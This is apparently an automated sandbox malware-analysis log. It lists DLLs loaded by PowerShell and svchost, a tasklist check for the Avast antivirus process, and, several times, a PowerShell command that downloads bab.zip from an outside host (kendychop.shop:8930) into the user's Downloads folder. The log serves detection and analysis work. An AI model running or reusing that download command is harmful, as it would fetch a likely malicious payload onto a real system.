Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
